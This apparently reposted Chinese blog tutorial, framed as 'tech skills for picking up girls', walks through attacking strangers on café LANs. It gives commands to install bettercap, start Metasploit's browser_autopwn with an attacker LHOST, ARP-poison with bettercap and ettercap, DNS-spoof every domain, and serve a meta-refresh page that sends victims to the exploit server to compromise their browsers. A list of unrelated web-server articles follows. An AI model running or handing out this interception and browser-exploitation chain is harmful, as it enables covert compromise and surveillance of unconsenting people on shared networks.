【技术追妹学问】内网世界的王者

   2017-01-06 0
核心提示:各位小司机你们好吗,记以前出过一个系列如何在咖啡厅等局域网场合内轻松泡到妹子后.本司机收到了好多小司机的反应说教程好可以,然而最近好无聊好无聊,本司机又想去那个啥了,然后给你们写了下列文章。今天用到的三款大家熟悉的工具,bettercap,ettercap,

各位小司机你们好吗,记以前出过一个系列如何在咖啡厅等局域网场合内轻松泡到妹子后.本司机收到了好多小司机的反应说教程好可以,然而最近好无聊好无聊,本司机又想去那个啥了,然后给你们写了下列文章。

今天用到的三款大家熟悉的工具,bettercap,ettercap,MSF。这三款工具。【个人喜欢用ettercat不过ettercap很成功,但在新时代下它已经老了 ettercap的过滤器复杂,使用门槛高,在大型网络下,主机发现功能效果很差.优化不够,对研究人员来说,无用的功能太多 ,扩展性不够,开发需要掌握C/C++语言 所以我们要逐渐的放弃ettercap 不过还是有喜欢用的朋友,我会做两个版本的相关文章给大家演示的。

安装:

[C] 纯文本查看 复制代码

git clone [url]https://github.com/evilsocket/bettercap[/url]
cd bettercap
gem build bettercap.gemspec
sudo gem install bettercap*.gem

如果报错,如图:

【技术追妹学问】内网世界的王者

执行如下命令:

[C] 纯文本查看 复制代码

sudo apt-get install ruby-dev libpcap-dev
sudo gem install bettercap*.gem

【技术追妹学问】内网世界的王者

成功安装,下面是搜集的参数。

[HTML] 纯文本查看 复制代码

-I, –interface IFACE 指定Network interface name,默认eth0

    -S, –spoofer NAME 指定欺骗模块,此参数默认为ARP,目前仅支持ARP,新版本会添加更多选项

    -T, –target ADDRESS 指定单一ip,如果未设置,则代表所有子网,子网所有主机自动扫描,简单高效,十分推荐
    -O, –log LOG_FILE 日志功能

    -D, –debug 调试功能,会将每一步操作详细记录,便于调试

    -L, –local 解析流经本机的所有数据包(此操作会开启嗅探器),此参数默认为关闭

    -X, –sniffer 开启嗅探器. –sniffer-pcap FILE 将数据包保存为PCAP文件,可用Wireshark打开(此操作会开启嗅探器) –sniffer-filter EXPRESSION 配置嗅探器使用BPF过滤器(此操作会开启嗅探器)

    -P, –parsers PARSERS 指定数据包(此操作会开启嗅探器),支持NTLMSS, IRC, POST, URL, FTP, HTTPS, HTTPAUTH, MAIL,此参数默认为所有 –no-discovery 只使用当前的ARP缓存,不去扫描其他主机,此参数默认为关闭 –no-spoofing 关闭欺骗模块,也可以使用参数–spoofer NONE代替 –proxy 启用HTTP代理并且重定向所有HTTP请求至本机,此参数默认为关闭 –proxy-port PORT 设置HTTP代理端口,此参数默认为8080 –proxy-module MODULE 指定加载的Ruby模块 –httpd 开启HTTP服务器,此参数默认为关闭 –httpd-port PORT 指定HTTP server port, 此参数默认为8081. –httpd-path PATH 指定HTTP server path,此参数默认为 ./.

    -h, –help 英文帮助

然而ettercap系统自带的所以不用掩饰。

首先我们要开启

[C] 纯文本查看 复制代码

service postgresql start

打开MSF

【技术追妹学问】内网世界的王者

我们利用的是Browser_autopwn模块这是一个自动攻击浏览器的模块。它会自动感应攻击目标的浏览器并且对它发动适当的攻击。

命令:

[C] 纯文本查看 复制代码

use server/browser_autopwn

我们来设置我们的IP

命令:

[C] 纯文本查看 复制代码

set uripath /

命令:

[C] 纯文本查看 复制代码

set LHOST (你的IP地址)

运行命令:

[C] 纯文本查看 复制代码

run
【技术追妹学问】内网世界的王者

然后他会自动加载所以模块,加载好的样子。

【技术追妹学问】内网世界的王者

我们执行arp攻击

[C] 纯文本查看 复制代码

bettercap -X
【技术追妹学问】内网世界的王者

我们要创建一个dns欺骗的页面需要转到我们的那个端口。

打开我们KALI index.html

[C] 纯文本查看 复制代码

/var/www/html/index.html

[HTML] 纯文本查看 复制代码

<html>
        <head>
        <title>ichunqiu.com</title>
        <meta http-equiv="refresh" content="0;url=http://192.168.159.128:8080/">
                <body>
                        <p>i am ichunqiu.com</p>
                        <p>ichunqiu.com</p>
                </body>
        </head>
</html>
【技术追妹学问】内网世界的王者

然后我们开启apache2

[C] 纯文本查看 复制代码

etc/init.d/apache2 start
【技术追妹学问】内网世界的王者

开始dns欺骗:

[C] 纯文本查看 复制代码

dnsspoof -f /var/www/html/index.html

下面的情况可想而知....打开的页面会跳转到 http://192.168.159.128:8080/ 然后进行模块的匹配达到上线的目的。

ettercap文章我拿以前我写的给大家看思路都是一样的.

首先我们要修改一下ettercap里面的DNS劫持文件的数据修改成所有网站都替换成我们的DNS.

在对应的位置添加对应的 标识和IP地址  * 代表所有域名 后边就是你要欺骗为的IP地址,这里是当然是我自己的主机IP地址啦然后记得保存。

【技术追妹学问】内网世界的王者

【技术追妹学问】内网世界的王者

然后再来搭建一个web页面  

编辑/var/www/html/index.html文件  

改成你定义页面 这里我简单的写了一个html的主页。

我们在终端下打开ettercap的图像化界面!

输入命令:ettercap -G

【技术追妹学问】内网世界的王者

弹出来一个图形化界面,我们首先需要点击Sniff 然后选择Unified sniffng 。

【技术追妹学问】内网世界的王者

它会弹出让我们选择网卡,上节课我们介绍过了如何查找自己的网卡设备我就不再介绍了 然后我们确定。

【技术追妹学问】内网世界的王者

我们扫描一下我们的局域网内的主机 我们也可以用快捷方式来进行操作 Ctrl+s 可以快速扫描。

【技术追妹学问】内网世界的王者

【技术追妹学问】内网世界的王者

扫描完成以后我们打开扫描好的自己信息也可以Ctrl+h打开。

【技术追妹学问】内网世界的王者

我们把网关添加到Add to Target 1 右键添加Add to Target 2 添加攻击IP

【技术追妹学问】内网世界的王者

【技术追妹学问】内网世界的王者

这是添加好的样子。

然后点mitm --- arp posoning ,勾选sniff remote connections:

【技术追妹学问】内网世界的王者

然后我们在选择 plugins  然后选择第一个选项 也可以用快捷方式Ctrl+p

【技术追妹学问】内网世界的王者

进行欺骗DNS!

【技术追妹学问】内网世界的王者

之后start --- start sniffing开始监听 然后欺骗成功!!!!

 
反对 0举报 0 评论 0
 

免责声明:本文仅代表作者个人观点,与乐学笔记(本网)无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
    本网站有部分内容均转载自其它媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责,若因作品内容、知识产权、版权和其他问题,请及时提供相关证明等材料并与我们留言联系,本网站将在规定时间内给予删除等相关处理.

  • 入门篇:Ubuntu用apache做web服务器 ubuntu 安
    一、安装ApacheUbuntu提供了3个apache2的软件包,它们分别是apache2-mpm-worker、apache2-mpm-prefork、apache2-mpm-event。如果你在安装Ubuntu操作系统《入门篇:ubuntu server 安装教程》的时候你选择安装了LAMP包的话,那么安装的是apache2-mpm-prefork。
    02-10
  • nginx简介(轻量级开源高并发web服务器:大陆使
    一、总结1、在连接高并发的情况下,Nginx是Apache服务器不错的替代品,apache并发量大概3000+,nginx并发量2w+ 二、nginx简介(轻量级开源高并发web服务器:大陆使用者百度、京东、新浪、网易、腾讯、淘宝等)Nginx (engine x) 是一个高性能的HTTP和反向代
    02-10
  • nginx高性能WEB服务器系列之七--nginx反向代理
    nginx高性能WEB服务器系列之七--nginx反向代理
    nginx系列友情链接:nginx高性能WEB服务器系列之一简介及安装https://www.cnblogs.com/maxtgood/p/9597596.htmlnginx高性能WEB服务器系列之二命令管理https://www.cnblogs.com/maxtgood/p/9597990.htmlnginx高性能WEB服务器系列之三版本升级https://www.cnblog
    02-10
  • nginx反向代理三台web服务器,实现负载均衡
    修改nginx.conf#在http和server之间加入这个模块 upstream guaji{ server 127.0.0.1:8080; server 127.0.0.2:8080;server 127.0.0.3:8080; }nginx.conf的serverserver {  listen 80;   server_namelocalhost; #charset koi8-r; #access_loglogs/host.acce
    02-10
  • Nginx_修改Web服务器头信息(Header)里的Server
    http://blog.rekfan.com/?p=122黑客攻击一个网站,往往需要了解服务器的架构,网站的架构等信息,了解了这些信息,就知道网站薄弱的地方在哪里了!    为了不让对方知道自己的webserver真实环境,我们可以伪装隐藏自己的真实服务器环境.虽然安防不能做到100%,但
    02-10
  • Linux下配置nginx,负载IIS的页面 linux用nginx
    最近研究了下Linux下的nginx结果贴一下:反向代理概念:一般访问流程:a=b,a访问b服务器,加n来做反向代理流程:a=n=b负载均衡概率:a访问B站点,B站点有3台服务器,加入负载均衡n,a就访问n,n然后按照规程平均的转发给B站点的3台服务器。配置环境:1.本机
    02-10
  • 提高WEB服务器IIS并发数效率/服务器性能优化
    1. 启用HTTP的持续作用可以改善15~20%的执行效率。2. 不启用记录可以改善5~8%的执行效率。3. 使用 [独立] 的处理程序会损失20%的执行效率。4. 增加快取记忆体的保存文档数量,可提高ActiveServer Pages之效能。5. 勿使用CGI程式6. 增加IIS 5.0电脑CPU数量。7.
    02-10
  • Visual Studio提示“无法启动IIS Express Web服务器”的解决方法 调试闪退
    Visual Studio提示“无法启动IIS Express Web服
    有时,在使用Visual Studio运行ASP.NET项目时,会提示“无法启动IIS Express Web服务器”,无法运行,如图:这一般出现在重装系统之后,或者项目是从别的电脑上复制过来的。解决方法就是在解决方案文件夹下找到并删除“.vs”文件夹(可能是隐藏文件夹),重新
    02-10
  • 树莓派/Debian 构建LAMP Web服务器并搭建WordPress博客(一)
    树莓派/Debian 构建LAMP Web服务器并搭建WordPr
    一、前言学习在您的Raspberry Pi上设置LAMP(Linux,Apache,MariaDB,PHP)堆栈,并将其配置为 Web 服务器。您将下载并安装 WordPress 并设置一个基本网站,您可以在与Pi相同的网络上的任何设备***问该网站。注意:本文发布于 Debian 10.3 发行版刚出不久,
    02-10
  • 一篇文章带你了解轻量级Web服务器——Nginx简单入门
    一篇文章带你了解轻量级Web服务器——Nginx简单
    一篇文章带你了解轻量级Web服务器——Nginx简单入门Nginx是一款轻量级的Web服务器/反向代理服务器及电子邮件代理服务器在本篇中我们会简单介绍Nginx的特点,安装,相关指令使用以及配置信息和具体应用等本篇内容属于《瑞吉外卖》的知识科普部分,有兴趣可以查
    02-09
点击排行